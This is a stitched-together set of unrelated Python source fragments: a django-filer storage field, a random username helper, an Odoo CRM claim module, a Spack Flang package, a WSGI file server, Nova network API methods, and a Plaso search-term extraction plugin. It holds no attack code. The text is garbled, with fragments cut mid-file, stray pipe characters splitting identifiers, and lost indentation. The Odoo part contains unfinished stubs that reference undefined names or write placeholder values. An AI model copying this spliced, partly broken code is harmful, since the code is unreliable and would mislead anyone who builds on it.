        upload_to = filer_settings.FILER_PUBLICMEDIA_UPLOAD_TO
    else:
        upload_to = filer_settings.FILER_PRIVATEMEDIA_UPLOAD_TO
    return upload_to(instance, filename) if callable(upload_to) else upload_to
class MultiStorageFieldFile(ThumbnailerNameMixin,
                            easy_thumbnails_files.ThumbnailerFieldFile):
    def __init__(self, instance, field, name):
        """
        This is a little weird, but I couldn't find a better solution.
        Thumbnailer.__init__ is called first for proper object inizialization.
        Then we override some attributes defined at runtime with properties.
        We cannot simply call super().__init__ because filer Field objects
        doesn't have a storage attribute.
        """
        easy_thumbnails_files.Thumbnailer.__init__(self, None, name)
        self.instance = instance
        self.field = field
        self._committed = True
        self.storages = self.field.storages
        self.thumbnail_storages = self.field.thumbnail_storages
        self.thumbnail_options = self.field.thumbnail_options
        # materialize the property values as plain attributes
        self.storage = self._storage
        self.source_storage = self._source_storage
        self.thumbnail_storage = self._thumbnail_storage
        self.thumbnail_basedir = self._thumbnail_base_dir

    def _visibility(self):
        # Key into the storage/option dicts based on the owning instance.
        return 'public' if self.instance.is_public else 'private'

    @property
    def _storage(self):
        return self.storages[self._visibility()]

    @property
    def _source_storage(self):
        return self.storages[self._visibility()]

    @property
    def _thumbnail_storage(self):
        return self.thumbnail_storages[self._visibility()]

    @property
    def _thumbnail_base_dir(self):
        return self.thumbnail_options[self._visibility()].get('base_dir', '')

    def save(self, name, content, save=True):
        content.seek(0)  # Ensure we upload the whole file
        super(MultiStorageFieldFile, self).save(name, content, save)
class Multi | StorageFileField(easy_thumbnails_fields.ThumbnailerField):
attr_class = MultiStorageFieldFile
def __init__(self, verbose_name=None, name=None,
| storages=None, thumbnail_storages=None, thumbnail_options=None, **kwargs):
if 'upload_to' in kwargs: # pragma: no cover
upload_to = kwargs.pop("upload_to")
if upload_to != generate_filename_multistorage:
warnings.warn("MultiStorageFileField can handle only File objects;"
"%s passed" % upload_to, SyntaxWarning)
self.storages = storages or STORAGES
self.thumbnail_storages = thumbnail_storages or THUMBNAIL_STORAGES
self.thumbnail_options = thumbnail_options or THUMBNAIL_OPTIONS
super(easy_thumbnails_fields.ThumbnailerField, self).__init__(
verbose_name=verbose_name, name=name,
upload_to=generate_filename_multistorage,
storage=None, **kwargs)
def value_to_string(self, obj):
value = super(MultiStorageFileField, self).value_to_string(obj)
if not filer_settings.FILER_DUMP_PAYLOAD:
return value
try:
payload_file = BytesIO(self.storage.open(value).read())
sha = hashlib.sha1()
sha.update(payload_file.read())
if sha.hexdigest() != obj.sha1:
warnings.warn('The checksum for "%s" diverges. Check for file consistency!' % obj.original_filename)
payload_file.seek(0)
encoded_string = base64.b64encode(payload_file.read()).decode('utf-8')
return value, encoded_string
except IOError:
warnings.warn('The payload for "%s" is missing. No such file on disk: %s!' % (obj.original_filename, self.storage.location))
return value
def to_python(self, value):
if isinstance(value, list) and len(value) == 2 and isinstance(value[0], six.text_type):
filename, payload = value
try:
payload = base64.b64decode(payload)
except TypeError:
pass
else:
if self.storage.exists(filename):
self.storage.delete(filename)
self.storage.save(filename, ContentFile(payload))
return filename
return value
|
import | string
from random import choice
from django.contrib.auth.models import User
def get_random_id():
    """Return an unused username of the form AB12345678
    (two uppercase letters followed by eight digits).

    NOTE: uses ``random.choice``; switch to the ``secrets`` module if these
    ids are ever security-sensitive.
    """
    while True:
        letters = ''.join(choice(string.ascii_uppercase) for _ in range(2))
        digits = ''.join(choice(string.digits) for _ in range(8))
        test_name = u'%s%s' % (letters, digits)
        try:
            User.objects.get(username=test_name)
        except User.DoesNotExist:
            # BUGFIX: was a bare ``except:`` that also swallowed database
            # errors and MultipleObjectsReturned; only "no such user"
            # means the id is actually free.
            return test_name
        # a user with this name exists -> draw again
| |
'user_id': fields.many2one('res.users', 'Responsible', track_visibility='always'),
'day_to_action_next': fields.integer('Days to next action'),
'action_next': fields.char('Next Action'),
'days_to_date_deadline': fields.char('Date to deadline'),
}
_defaults = {
'day_next_action': lambda self, cr, uid, context: '7',
}
crm_claim_stage()
class crm_claim_type(osv.osv):
    """ Type of Claim """
    _name = "crm.claim.type"
    _description = "Type of Claim"
    _columns = {
        'name': fields.char('Name', required=True, translate=True),
        # self-referencing hierarchy of claim types; children are removed
        # with their parent (ondelete='cascade')
        'parent_id': fields.many2one('crm.claim.type', 'Type of claim', required=False, ondelete='cascade',
                                     help="Claim type."),
    }
    # NOTE(review): the string below is commented-out legacy code kept as a
    # no-op expression; delete it once confirmed unused.
    """def _find_object_id(self, cr, uid, context=None):
        context = context or {}
        object_id = context.get('object_id', False)
        ids = self.pool.get('ir.model').search(cr, uid, ['|', ('id', '=', object_id), ('model', '=', context.get('object_name', False))])
        return ids and ids[0] or False
    _defaults = {
        'object_id': _find_object_id
    }"""
class claim_from_invoice(osv.osv_memory):
    """Transient wizard model for creating a claim from an invoice."""
    _name = 'claim.from.invoice'
    _description = 'claim from invoice'
    _columns = {
        'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
    }
    def claim_from_invoice(self, cr, uid, ids, context=None):
        # Debug stub: only logs the ids and implicitly returns None —
        # NOTE(review): presumably meant to delegate to claim creation.
        _logger.info("filoquin ----- ids : %r", ids)
class view_account_invoice_claims(osv.osv):
    """Read-only model (``_auto = False``, backed by a database view)
    listing claims per account invoice."""
    _name = "view.account.invoice.claims"
    _description = "Claim by account invoice"
    _auto = False  # table is not created by the ORM; a SQL view backs it
    _columns = {
        'id': fields.integer('ID', readonly=True),
        'invoice_id': fields.many2one('account.invoice', 'Invoice'),
        'partner_id': fields.many2one('res.partner', 'Partner'),
        'number': fields.char('number'),
        'name': fields.char('name'),
        'claim_id': fields.many2one('crm.claim', 'Claim'),
        'crm_claim_name': fields.char('Subject'),
        'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
        #'invoice_line_text_line':fields.function('get_text_lines', store=False,relation='view.account.invoice.claims' ,
        #                                          method=True, string='lines',type='char')
        # computed, non-stored summary of the invoice lines
        'invoice_line_text': fields.char(compute='_get_text_lines' ,store=False, string="Productos"),
    }
    @api.depends('invoice_line_text','invoice_line')
    def _get_text_lines(self):
        # New-API compute method on an old-API osv model.
        # NOTE(review): currently writes the placeholder text 'sada' instead
        # of a real summary of the invoice lines — confirm intended content.
        _logger.info("filoquin ----- self : %r", self)
        for record in self:
            record.invoice_line_text ='sada'
    def prueba(self, cr, uid,ids, context=None):
        # Debug-only method ("prueba" = test): logs its arguments and
        # implicitly returns None.
        _logger.info("filoquin ----- ids : %r", ids)
        _logger.info("filoquin ----- context : %r", context)
def _get_default_warehouse(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
company_id = user.company_id.id
wh_obj = self.pool.get('stock.warehouse')
wh_ids = wh_obj.search(cr, uid,
[('company_id', '=', company_id)],
context=context)
if not wh_ids:
raise orm.except_orm(
_('Error!'),
_('There is no warehouse for the current user\'s company.'))
return wh_ids[0]
def create(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- create : %r", vals)
#newclaim=self.newclaim( cr, uid, [vals['invoice_id']], context=None)
_logger.info("filoquin ----- newclaim : %r", newclaim)
pass
    def write(self, cr, uid, vals, context=None):
        # Writes to this database-view model are logged and dropped.
        # NOTE(review): the ORM write() contract normally returns True —
        # this returns None; confirm callers tolerate that.
        _logger.info("filoquin ----- write : %r", vals)
        pass
def newclaim(self, cr, uid, ids, context=None):
res_invoice_id = ids[0]
claims = self.pool.get('crm.claim').search(cr,uid,
[('invoice_id', '=', res_invoice_id)],
context=context)
if claims :
return self.open_claim(cr, uid, claims[0], context=context)
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
invoice = self.pool.get('account.invoice').browse(cr, uid, res_invoice_id, context=context)
new_claim={'invoice_id': res_invoice_id,
'number_id' : '/',
'partner_id': invoice.partner_id.id,
'email_from': invoice.partner_id.email,
'partner_phone': invoice.partner_id.phone,
'claim_type': 'customer',
'company_id': user.company_id.id,
'name': 'prueba ' }
claim_line_ids=self.add_lines(cr, uid,res_invoice_id, new_claim['claim_type'],datetime.now,
new_claim['company_id'],context=context)
new_claim['claim_line_ids']=[(6,0,claim_line_ids)]
return_id = self.pool.get('crm.claim').create(cr,uid,new_claim)
return self.open_claim(cr, uid, return_id, context=context)
    def add_lines(self,cr, uid, invoice_id, claim_type, claim_date, company_id, context=None):
        """Create one claim.line per line of *invoice_id* and return the list
        of created claim-line ids.

        Each line is enriched with warranty-limit and warranty-return-address
        data computed by the claim.line model; warranty computation failures
        (missing invoice date / supplier) are tolerated.
        """
        invoice_line_obj = self.pool.get('account.invoice.line')
        invoice_obj = self.pool.get('account.invoice')
        product_obj = self.pool['product.product']
        claim_line_obj = self.pool.get('claim.line')
        company_obj = self.pool['res.company']
        warehouse_obj = self.pool['stock.warehouse']
        invoice_line_ids = invoice_line_obj.search(
            cr, uid,
            [('invoice_id', '=', invoice_id)],
            context=context)
        claim_lines = []
        value = {}  # NOTE(review): never used below — candidate for removal
        warehouse_id = self._get_default_warehouse(cr, uid,
                                                   context=context)
        invoice_lines = invoice_line_obj.browse(cr, uid, invoice_line_ids,
                                                context=context)

        def warranty_values(invoice, product):
            # Compute warranty limit + return address for one product;
            # best-effort: unresolvable warranty data is blanked, not fatal.
            values = {}
            try:
                warranty = claim_line_obj._warranty_limit_values(
                    cr, uid, [], invoice,
                    claim_type, product,
                    claim_date, context=context)
            except (InvoiceNoDate, ProductNoSupplier):
                # we don't mind at this point if the warranty can't be
                # computed and we don't want to block the user
                values.update({'guarantee_limit': False, 'warning': False})
            else:
                values.update(warranty)
            company = company_obj.browse(cr, uid, company_id, context=context)
            warehouse = warehouse_obj.browse(cr, uid, warehouse_id,
                                             context=context)
            warranty_address = claim_line_obj._warranty_return_address_values(
                cr, uid, [], product, company,
                warehouse, context=context)
            values.update(warranty_address)
            return values
        for invoice_line in invoice_lines:
            location_dest_id = claim_line_obj.get_destination_location(
                cr, uid, invoice_line.product_id.id,
                warehouse_id, context=context)
            line = {
                'name': invoice_line.name,
                'claim_origine': "none",
                'invoice_line_id': invoice_line.id,
                'product_id': invoice_line.product_id.id,
                'product_returned_quantity': invoice_line.quantity,
                'unit_sale_price': invoice_line.price_unit,
                'location_dest_id': location_dest_id,
                'state': 'draft',
            }
            line.update(warranty_values(invoice_line.invoice_id,invoice_line.product_id))
            line_id=self.pool.get('claim.line').create(cr, uid,line)
            claim_lines.append(line_id)
        return claim_lines;
def open_claim(self, cr, uid, claim_id, context=None):
ir_model_data = self.pool.get('ir.model.data')
form_res = ir_model_data.get_object_reference(cr, uid, 'crm_claim', 'crm_case |
##############################################################################
# Copyright (c) 2017, Los Alamos National Security, LLC
# Produced at the Los Alamos National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Flang(CMakePackage):
    """Flang is a Fortran compiler targeting LLVM."""

    homepage = "https://github.com/flang-compiler/flang"
    url = "https://github.com/flang-compiler/flang/archive/flang_20180612.tar.gz"
    git = "https://github.com/flang-compiler/flang.git"

    version('develop', branch='master')
    version('20180612', '62284e26214eaaff261a922c67f6878c')

    # Flang needs the matching flang-patched LLVM for each release/arch.
    depends_on('llvm@flang-develop', when='@develop')
    depends_on('llvm@flang-20180612', when='@20180612 target=x86_64')
    # LLVM version specific to OpenPOWER.
    depends_on('llvm@flang-ppc64le-20180612', when='@20180612 target=ppc64le')
    depends_on('pgmath@develop', when='@develop')
    depends_on('pgmath@20180612', when='@20180612')

    def cmake_args(self):
        """Build flang with the flang-patched clang/clang++/flang toolchain."""
        options = [
            '-DWITH_WERROR=OFF',
            '-DCMAKE_C_COMPILER=%s' % os.path.join(
                self.spec['llvm'].prefix.bin, 'clang'),
            '-DCMAKE_CXX_COMPILER=%s' % os.path.join(
                self.spec['llvm'].prefix.bin, 'clang++'),
            '-DCMAKE_Fortran_COMPILER=%s' % os.path.join(
                self.spec['llvm'].prefix.bin, 'flang'),
            '-DFLANG_LIBOMP=%s' % find_libraries(
                'libomp', root=self.spec['llvm'].prefix.lib)
        ]
        return options

    @run_after('install')
    def post_install(self):
        # we are installing flang in a path different from llvm, so we
        # create a wrapper with -L for e.g. libflangrti.so and -I for
        # e.g. iso_c_binding.mod. -B is needed to help flang to find
        # flang1 and flang2. rpath_arg is needed so that executables
        # generated by flang can find libflang later.
        flang = os.path.join(self.spec.prefix.bin, 'flang')
        # The context manager closes the file; the previous explicit
        # out.close() was redundant and has been removed.
        with open(flang, 'w') as out:
            out.write('#!/bin/bash\n')
            out.write(
                '{0} -I{1} -L{2} -L{3} {4}{5} {6}{7} -B{8} "$@"\n'.format(
                    self.spec['llvm'].prefix.bin.flang,
                    self.prefix.include, self.prefix.lib,
                    self.spec['pgmath'].prefix.lib,
                    self.compiler.fc_rpath_arg, self.prefix.lib,
                    self.compiler.fc_rpath_arg,
                    self.spec['pgmath'].prefix.lib, self.spec.prefix.bin))
        chmod = which('chmod')
        chmod('+x', flang)

    def setup_environment(self, spack_env, run_env):
        # to find llvm's libc++.so
        spack_env.set('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
        run_env.set('FC', join_path(self.spec.prefix.bin, 'flang'))
        run_env.set('F77', join_path(self.spec.prefix.bin, 'flang'))
        run_env.set('F90', join_path(self.spec.prefix.bin, 'flang'))
|
ons::
[wsgi_fs]
call = brim.wsgi_fs.WSGIFS
# path = <path>
# The request path to match and serve; any paths that do not begin
# with this value will be passed on to the next WSGI app in the
# chain. Default: /
# serve_path = <path>
# The local file path containing files to serve.
"""
"""Copyright and License.
Copyright 2014 Gregory Holt
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mimetypes
import os
import time
from cgi import escape
from brim import http
MONTH_ABR = (
    'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',
    'Nov', 'Dec')
WEEKDAY_ABR = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')


def http_date_time(when):
    """Returns a date and time formatted as per HTTP RFC 2616."""
    # Hand-rolled rather than strftime so the output is locale-independent.
    t = time.gmtime(when)
    return '{0}, {1:02d} {2:>3} {3:4d} {4:02d}:{5:02d}:{6:02d} GMT'.format(
        WEEKDAY_ABR[t.tm_wday], t.tm_mday, MONTH_ABR[t.tm_mon - 1],
        t.tm_year, t.tm_hour, t.tm_min, t.tm_sec)
def _openiter(path, chunk_size, total_size):
left = total_size
with open(path, 'rb') as source:
while True:
chunk = source.read(min(chunk_size, left))
if not chunk:
break
left -= len(chunk)
yield chunk
if left >= chunk_size:
chunk = ' ' * chunk_size
while left >= chunk_size:
left -= chunk_size
yield chunk
if left:
yield ' ' * left
class WSGIFS(object):
"""A WSGI app for serving up files from the file system.
See :py:mod:`brim.wsgi_fs` for more information.
:param name: The name of the app.
:param parsed_conf: The conf result from :py:meth:`parse_conf`.
:param next_app: The next WSGI app in the chain.
"""
def __init__(self, name, parsed_conf, next_app):
    """Initialize the file-serving app from its parsed configuration.

    :param name: The name of the app.
    :param parsed_conf: The conf result from :py:meth:`parse_conf`.
    :param next_app: The next WSGI app in the chain.
    """
    self.name = name
    """The name of the app."""
    self.next_app = next_app
    """The next WSGI app in the chain."""
    self.path = parsed_conf['path']
    """The request path to match and serve.

    Any paths that do not begin with this value will be passed on to
    the next WSGI app in the chain. The attribute will have leading
    and trailing forward slashes removed.
    """
    self.serve_path = parsed_conf['serve_path']
    """The local file path containing files to serve."""
def __call__(self, env, start_response):
    """Handles incoming WSGI requests.

    Requests that start with the configured path simply serve up any
    files under the configured location on the file system. Other
    requests are passed on to the next WSGI app in the chain.

    :param env: The WSGI env as per the spec.
    :param start_response: The WSGI start_response as per the spec.
    :returns: Calls *start_response* and returns an iterable as per
        the WSGI spec.
    """
    path = os.path.normpath(env['PATH_INFO'].strip('/'))
    if path == self.path:
        path = '.'
    elif path.startswith(self.path + '/'):
        path = path[len(self.path) + 1:]
        if not path:
            path = '.'
    elif self.path:
        # Outside our configured prefix; hand off to the next app.
        return self.next_app(env, start_response)
    if path == '..' or path.startswith('..' + os.path.sep):
        # Refuse path traversal above the serve root.
        return http.HTTPForbidden()(env, start_response)
    path = os.path.join(self.serve_path, path)
    if not os.path.exists(path):
        return http.HTTPNotFound()(env, start_response)
    if os.path.isdir(path):
        if not env['PATH_INFO'].endswith('/'):
            # Canonicalize directory URLs to end with a slash.
            return http.HTTPMovedPermanently(
                headers={'Location': env['PATH_INFO'] + '/'})(
                    env, start_response)
        dirpath = path
        path = os.path.join(path, 'index.html')
        if not os.path.exists(path):
            return self.listing(dirpath, env, start_response)
    content_type = mimetypes.guess_type(path)[0] or \
        'application/octet-stream'
    stat = os.stat(path)
    if not stat.st_size:
        start_response(
            '204 No Content',
            [('Content-Length', '0'), ('Content-Type', content_type)])
        # BUGFIX: must return here. Previously execution fell through and
        # invoked start_response a second time with 200 OK, which is
        # illegal under PEP 3333 unless exc_info is supplied.
        return ''
    start_response(
        '200 OK',
        [('Content-Length', str(stat.st_size)),
         ('Content-Type', content_type),
         ('Last-Modified',
          http_date_time(min(stat.st_mtime, time.time())))])
    if env['REQUEST_METHOD'] == 'HEAD':
        return ''
    return _openiter(path, 65536, stat.st_size)
def listing(self, path, env, start_response):
if not path.startswith(self.serve_path + '/'):
return http.HTTPForbidden()(env, start_response)
rpath = '/' + self.path + '/' + path[len(self.serve_path) + 1:]
epath = escape(rpath)
body = (
'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 '
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n'
'<html>\n'
' <head>\n'
' <title>Listing of %s</title>\n'
' <style type="text/css">\n'
' h1 {font-size: 1em; font-weight: bold;}\n'
' th {text-align: left; padding: 0px 1em 0px 1em;}\n'
' td {padding: 0px 1em 0px 1em;}\n'
' a {text-decoration: none;}\n'
' .colsize {text-align: right;}\n'
' </style>\n'
' </head>\n'
' <body>\n'
' <h1 id="title">Listing of %s</h1>\n'
' <table id="listing">\n'
' <tr id="heading">\n'
' <th class="colname">Name</th>\n'
' <th class="colsize">Size</th>\n'
' <th class="coldate">Date</th>\n'
' </tr>\n' % (epath, epath))
if env['PATH_INFO'].count('/') > 1:
body += (
' <tr id="parent" class="item">\n'
' <td class="colname"><a href="../">../</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n')
listing = sorted(os.listdir(path))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isdir(itempath):
body += (
' <tr class="item subdir">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n' % (http.quote(item), escape(item)))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isfile(itempath):
ext = os.path.splitext(item)[1].lstrip('.')
size = os.path.getsize(itempath)
mtime = os.path.getmt | ime(itempath)
body += (
' <tr class="item %s">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize">'
'<script type="text/javascript">'
'document.write(new Number(%s).toLocaleString());'
'</script></td>\n'
| ' <td class="coldate">'
'<script type="text/javascript">'
'document.write(new Date(%s * 1000).toLocaleString());'
'</script></td>\n'
' </tr>\n' %
('ext' + ext, http.quote(item), escape(item), size, mtime))
body += (
' </table>\n'
' |
instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
# NOTE(vish): We can't do the floating ip deallocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
if not isinstance(instance, obj_base.NovaObject):
instance = objects.Instance._from_db_object(context,
objects.Instance(), instance)
self.network_rpcapi.deallocate_for_instance(context, instance=instance,
requested_networks=requested_networks)
# NOTE(danms): Here for neutron compatibility
def allocate_port_for_instance(self, context, instance, port_id,
                               network_id=None, requested_ip=None):
    """Not supported by this backend; ports are a neutron-only concept."""
    raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def deallocate_port_for_instance(self, context, instance, port_id):
    """Not supported by this backend; ports are a neutron-only concept."""
    raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def list_ports(self, *args, **kwargs):
    """Not supported by this backend; ports are a neutron-only concept."""
    raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def show_port(self, *args, **kwargs):
    """Not supported by this backend; ports are a neutron-only concept."""
    raise NotImplementedError()
@wrap_check_policy
@base_api.refresh_cache
def add_fixed_ip_to_instance(self, context, instance, network_id):
    """Adds a fixed ip to instance from specified network."""
    flavor = flavors.extract_flavor(instance)
    # Same RPC call as before, with the keyword arguments spelled inline
    # instead of collected in an intermediate dict.
    nw_info = self.network_rpcapi.add_fixed_ip_to_instance(
        context,
        instance_id=instance['uuid'],
        rxtx_factor=flavor['rxtx_factor'],
        host=instance['host'],
        network_id=network_id)
    return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
@base_api.refresh_cache
def remove_fixed_ip_from_instance(self, context, instance, address):
    """Removes a fixed ip from instance from specified network."""
    flavor = flavors.extract_flavor(instance)
    # Same RPC call as before, with the keyword arguments spelled inline
    # instead of collected in an intermediate dict.
    nw_info = self.network_rpcapi.remove_fixed_ip_from_instance(
        context,
        instance_id=instance['uuid'],
        rxtx_factor=flavor['rxtx_factor'],
        host=instance['host'],
        address=address)
    return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def add_network_to_project(self, context, project_id, network_uuid=None):
    """Force adds another network to a project.

    Delegates to the network RPC API; no result is returned.
    """
    self.network_rpcapi.add_network_to_project(context, project_id,
                                               network_uuid)
@wrap_check_policy
def associate(self, context, network_uuid, host=base_api.SENTINEL,
              project=base_api.SENTINEL):
    """Associate or disassociate host or project to network.

    SENTINEL distinguishes "argument not passed" from an explicit
    ``None``: leaving the default makes no change for that dimension,
    passing ``None`` disassociates, and passing a value associates.
    """
    network = self.get(context, network_uuid)
    if host is not base_api.SENTINEL:
        if host is None:
            # Explicit None: drop the host association only.
            objects.Network.disassociate(context, network.id,
                                         host=True, project=False)
        else:
            network.host = host
            network.save()
    if project is not base_api.SENTINEL:
        if project is None:
            # Explicit None: drop the project association only.
            objects.Network.disassociate(context, network.id,
                                         host=False, project=True)
        else:
            objects.Network.associate(context, project,
                                      network_id=network.id, force=True)
@wrap_check_policy
def get_instance_nw_info(self, context, instance, **kwargs):
    """Returns all network info related to an instance.

    Also refreshes the instance's network info cache as a side effect
    (without propagating to cells; see NOTE below).
    """
    result = self._get_instance_nw_info(context, instance)
    # NOTE(comstud): Don't update API cell with new info_cache every
    # time we pull network info for an instance. The periodic healing
    # of info_cache causes too many cells messages. Healing the API
    # will happen separately.
    base_api.update_instance_cache_with_nw_info(self, context, instance,
                                                result, update_cells=False)
    return result
def _get_instance_nw_info(self, context, instance):
    """Returns all network info related to an instance."""
    flavor = flavors.extract_flavor(instance)
    # Same RPC call as before, with the keyword arguments spelled inline
    # instead of collected in an intermediate dict.
    nw_info = self.network_rpcapi.get_instance_nw_info(
        context,
        instance_id=instance['uuid'],
        rxtx_factor=flavor['rxtx_factor'],
        host=instance['host'],
        project_id=instance['project_id'])
    return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def validate_networks(self, context, requested_networks, num_instances):
    """Validate the networks passed at the time of creating the server.

    Return the number of instances that can be successfully allocated
    with the requested network configuration.
    """
    if requested_networks:
        # Raises on the RPC side if the requested networks are invalid.
        self.network_rpcapi.validate_networks(context,
                                              requested_networks)
    # Neutron validation checks and returns how many of num_instances
    # instances can be supported by the quota. For Nova network
    # this is part of the subsequent quota check, so we just return
    # the requested number in this case.
    return num_instances
def create_pci_requests_for_sriov_ports(self, context,
                                        pci_requests,
                                        requested_networks):
    """Check requested networks for any SR-IOV port request.

    Create a PCI request object for each SR-IOV port, and add it to the
    pci_requests object that contains a list of PCI request object.
    """
    # This is NOOP for Nova network since it doesn't support SR-IOV.
    pass
@wrap_check_policy
def get_instance_uuids_by_ip_filter(self, context, filters):
    """Returns a list of dicts in the form of
    {'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
    """
    # Straight delegation to the network RPC service.
    return self.network_rpcapi.get_instance_uuids_by_ip_filter(context,
                                                               filters)
@wrap_check_policy
def get_dns_domains(self, context):
    """Returns a list of available dns domains.

    These can be used to create DNS entries for floating ips.
    """
    # Straight delegation to the network RPC service.
    return self.network_rpcapi.get_dns_domains(context)
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
    """Create specified DNS entry for address."""
    # Same RPC call as before, keyword arguments written inline instead
    # of gathered in an intermediate dict.
    return self.network_rpcapi.add_dns_entry(
        context, address=address, name=name, dns_type=dns_type,
        domain=domain)
@wrap_check_policy
def modify_dns_entry(self, context, name, address, domain):
    """Modify the specified DNS entry for address."""
    args = {'address': address,
            'name': name,
            'domain': domain}
    return self.network_rpcapi.modify_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
    """Delete the specified dns entry."""
    # Same RPC call as before, keyword arguments written inline instead
    # of gathered in an intermediate dict.
    return self.network_rpcapi.delete_dns_entry(context, name=name,
                                                domain=domain)
@wrap_check_policy
def delete_dns_domain(self, context, domain):
    """Delete the specified dns domain."""
    # Straight delegation to the network RPC service.
    return self.network_rpcapi.delete_dns_domain(context, domain=domain)
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
    """Get entries for address and domain."""
    # Same RPC call as before, keyword arguments written inline instead
    # of gathered in an intermediate dict.
    return self.network_rpcapi.get_dns_entries_by_address(
        context, address=address, domain=domain)
@wrap_check_policy
def get_dns_entries_by_name(self, context, |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A plugin that extracts browser history from events."""
import collections
import logging
import urllib
from plaso import filters
from plaso.analysis import interface
from plaso.lib import event
from plaso.lib import eventdata
def ScrubLine(line):
    """Scrub the line of most obvious HTML codes.

    An attempt at taking a line and swapping all instances
    of %XX which represent a character in hex with it's
    unicode character.

    Args:
      line: The string that we are about to "fix".

    Returns:
      String that has it's %XX hex codes swapped for text.
    """
    if not line:
        return ''
    try:
        # Python 2: percent-decode the byte string, then interpret the
        # result as UTF-8.
        return unicode(urllib.unquote(str(line)), 'utf-8')
    except UnicodeDecodeError:
        # Best effort: log and keep the raw line rather than failing
        # the whole analysis pass.
        logging.warning(u'Unable to decode line: {0:s}'.format(line))
        return line
class FilterClass(object):
    """A class that contains all the parser functions.

    Each public classmethod takes a URL string and returns the extracted
    search term (with '+' turned into spaces), or None when the URL does
    not look like a search for that engine.
    """

    @classmethod
    def _GetBetweenQEqualsAndAmbersand(cls, string):
        """Return back string that is defined 'q=' and '&'."""
        if 'q=' not in string:
            return string
        _, _, line = string.partition('q=')
        before_and, _, _ = line.partition('&')
        if not before_and:
            return line
        return before_and.split()[0]

    @classmethod
    def _SearchAndQInLine(cls, string):
        """Return a bool indicating if the words q= and search appear in string."""
        return 'search' in string and 'q=' in string

    @classmethod
    def GoogleSearch(cls, url):
        """Return back the extracted string."""
        # Identical extraction to any q=-style engine; delegate so the
        # parsing logic lives in exactly one place.
        return cls.GenericSearch(url)

    @classmethod
    def YouTube(cls, url):
        """Return back the extracted string."""
        return cls.GenericSearch(url)

    @classmethod
    def BingSearch(cls, url):
        """Return back the extracted string."""
        return cls.GenericSearch(url)

    @classmethod
    def GenericSearch(cls, url):
        """Return back the extracted string from a generic search engine."""
        if not cls._SearchAndQInLine(url):
            return
        return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')

    @classmethod
    def Yandex(cls, url):
        """Return back the results from Yandex search engine."""
        # Yandex uses 'text=' instead of 'q=' for the query parameter.
        if 'text=' not in url:
            return
        _, _, line = url.partition('text=')
        before_and, _, _ = line.partition('&')
        if not before_and:
            return
        yandex_search_url = before_and.split()[0]
        return yandex_search_url.replace('+', ' ')

    @classmethod
    def DuckDuckGo(cls, url):
        """Return back the extracted string."""
        if 'q=' not in url:
            return
        return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')

    @classmethod
    def Gmail(cls, url):
        """Return back the extracted string."""
        # Gmail encodes the search term in the URL fragment as
        # .../#search/<term>[/...][?compose...].
        if 'search/' not in url:
            return
        _, _, line = url.partition('search/')
        first, _, _ = line.partition('/')
        second, _, _ = first.partition('?compose')
